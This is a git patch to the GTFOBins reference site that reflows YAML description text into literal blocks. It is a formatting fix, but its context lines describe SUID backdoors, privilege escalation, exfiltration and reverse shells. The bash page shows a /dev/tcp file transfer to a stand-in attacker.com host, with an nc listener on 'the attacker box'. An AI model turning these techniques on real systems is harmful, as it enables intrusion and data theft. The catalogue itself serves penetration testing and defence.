From 5a1c87e7c50cfab1e9b53841b8cfe238ed03dd1c Mon Sep 17 00:00:00 2001 From: Andrea Cardaci Date: Fri, 1 Jun 2018 12:40:05 +0200 Subject: [PATCH] Fix YAML literal blocks --- _data/functions.yml | 57 +++++++++++++++++++++++++++++++++----------- _gtfobins/bash.md | 2 +- _gtfobins/busybox.md | 4 +++- _gtfobins/ld.so.md | 3 ++- _gtfobins/sort.md | 3 ++- _gtfobins/tee.md | 3 ++- _gtfobins/ul.md | 4 +++- _gtfobins/uniq.md | 3 ++- 8 files changed, 58 insertions(+), 21 deletions(-) diff --git a/_data/functions.yml b/_data/functions.yml index 1764a48..cb15696 100644 --- a/_data/functions.yml +++ b/_data/functions.yml @@ -1,55 +1,84 @@ execute-interactive: label: Interactive execute - description: It executes interactive commands that may be used to break out from restricted shells. + description: | + It executes interactive commands that may be used to break out from + restricted shells. execute-non-interactive: label: Non-interactive execute - description: It executes non-interactive commands that may be used to break out from restricted shells. + description: | + It executes non-interactive commands that may be used to break out from + restricted shells. suid-enabled: label: SUID - description: It runs with the SUID bit set and may be exploited to access the file system, escalate or maintain access with elevated privileges working as a SUID backdoor. If it is used to run `/bin/sh -p`, omit the `-p` on systems like Debian that allow to run a SUID shell by default. + description: | + It runs with the SUID bit set and may be exploited to access the file + system, escalate or maintain access with elevated privileges working as a + SUID backdoor. If it is used to run `/bin/sh -p`, omit the `-p` on systems + like Debian that allow to run a SUID shell by default. suid-limited: label: Limited SUID - description: It runs with the SUID bit set and may be exploited to access the file system, escalate or maintain access with elevated privileges working as a SUID backdoor. Running `/bin/sh` only works on Debian systems that allow SUID shell execution by default. + description: | + It runs with the SUID bit set and may be exploited to access the file + system, escalate or maintain access with elevated privileges working as a + SUID backdoor. Running `/bin/sh` only works on Debian systems that allow + SUID shell execution by default. sudo-enabled: label: Sudo - description: It runs in privileged context and may be used to access the file system, escalate or maintain access with elevated privileges if enabled on `sudo`. + description: | + It runs in privileged context and may be used to access the file system, + escalate or maintain access with elevated privileges if enabled on `sudo`. download: label: Download - description: It can download remote files. + description: | + It can download remote files. upload: label: Upload - description: It can exfiltrate files on the network. + description: | + It can exfiltrate files on the network. bind-shell-interactive: label: Interactive bind shell - description: It can bind a shell to a local port to allow remote network access. + description: | + It can bind a shell to a local port to allow remote network access. reverse-shell-interactive: label: Interactive reverse shell - description: It can send back a reverse shell to a listening attacker to open a remote network access. + description: | + It can send back a reverse shell to a listening attacker to open a remote + network access. bind-shell-non-interactive: label: Non-interactive bind shell - description: It can bind a non-interactive shell to a local port to allow remote network access. + description: | + It can bind a non-interactive shell to a local port to allow remote network + access. reverse-shell-non-interactive: label: Non-interactive reverse shell - description: It can send back a non-interactive reverse shell to a listening attacker to open a remote network access. + description: | + It can send back a non-interactive reverse shell to a listening attacker to + open a remote network access. load-library: label: Library load - description: It loads shared libraries that may be used to run code in the binary execution context. + description: | + It loads shared libraries that may be used to run code in the binary + execution context. file-read: label: File read - description: It reads files and may be used to do privileged reads or disclose files outside a restricted file system. + description: | + It reads files and may be used to do privileged reads or disclose files + outside a restricted file system. file-write: label: File write - description: It writes files and may be used to do privileged writes or write files outside a restricted file system. + description: | + It writes files and may be used to do privileged writes or write files + outside a restricted file system. diff --git a/_gtfobins/bash.md b/_gtfobins/bash.md index b04ff3c..5be8eea 100644 --- a/_gtfobins/bash.md +++ b/_gtfobins/bash.md @@ -29,7 +29,7 @@ functions: 3<>/dev/tcp/$RHOST/$RPORT \ | { while read -r; do [ "$REPLY" = "$(echo -ne "\r")" ] && break; done; cat; } > $LFILE' - description: Fetch remote file using a TCP connection. Run `nc -l -p 12345 < "file_to_send"` on the attacker box to send the file. - code: |- + code: | export RHOST=attacker.com export RPORT=12345 export LFILE=file_to_get diff --git a/_gtfobins/busybox.md b/_gtfobins/busybox.md index dc295fc..c1eac8f 100644 --- a/_gtfobins/busybox.md +++ b/_gtfobins/busybox.md @@ -1,5 +1,7 @@ --- -description: BusyBox may contain many UNIX utilities, run `busybox --list-full` to check what GTFBins binaries are supported. Here some example. +description: | + BusyBox may contain many UNIX utilities, run `busybox --list-full` to check + what GTFBins binaries are supported. Here some example. functions: execute-interactive: - code: busybox sh diff --git a/_gtfobins/ld.so.md b/_gtfobins/ld.so.md index 84d96a4..b908a97 100644 --- a/_gtfobins/ld.so.md +++ b/_gtfobins/ld.so.md @@ -1,6 +1,7 @@ --- description: | - `ld.so` is the Linux dynamic linker/loader, its filename and location might change across distributions. The proper path is can be obtained with: + `ld.so` is the Linux dynamic linker/loader, its filename and location might + change across distributions. The proper path is can be obtained with: ``` $ strings /proc/self/exe | head -1 diff --git a/_gtfobins/sort.md b/_gtfobins/sort.md index 26fbc0d..fc34176 100644 --- a/_gtfobins/sort.md +++ b/_gtfobins/sort.md @@ -1,5 +1,6 @@ --- -description: The read file content is corrupted by being sorted. +description: | + The read file content is corrupted by being sorted. functions: sudo-enabled: - code: | diff --git a/_gtfobins/tee.md b/_gtfobins/tee.md index f3fc36d..51b3558 100644 --- a/_gtfobins/tee.md +++ b/_gtfobins/tee.md @@ -1,5 +1,6 @@ --- -description: It can only append data if the destination exists. +description: | + It can only append data if the destination exists. functions: sudo-enabled: - code: | diff --git a/_gtfobins/ul.md b/_gtfobins/ul.md index 76af411..014d734 100644 --- a/_gtfobins/ul.md +++ b/_gtfobins/ul.md @@ -1,5 +1,7 @@ --- -description: The read file content is corrupted by replacing occurrences of `$'\b_'` to terminal sequences and by converting tabs to spaces. +description: | + The read file content is corrupted by replacing occurrences of `$'\b_'` to + terminal sequences and by converting tabs to spaces. functions: sudo-enabled: - code: | diff --git a/_gtfobins/uniq.md b/_gtfobins/uniq.md index 5bd5df1..b8b09f8 100644 --- a/_gtfobins/uniq.md +++ b/_gtfobins/uniq.md @@ -1,5 +1,6 @@ --- -description: The read file content is corrupted by squashing multiple adjacent lines. +description: | + The read file content is corrupted by squashing multiple adjacent lines. functions: sudo-enabled: - code: |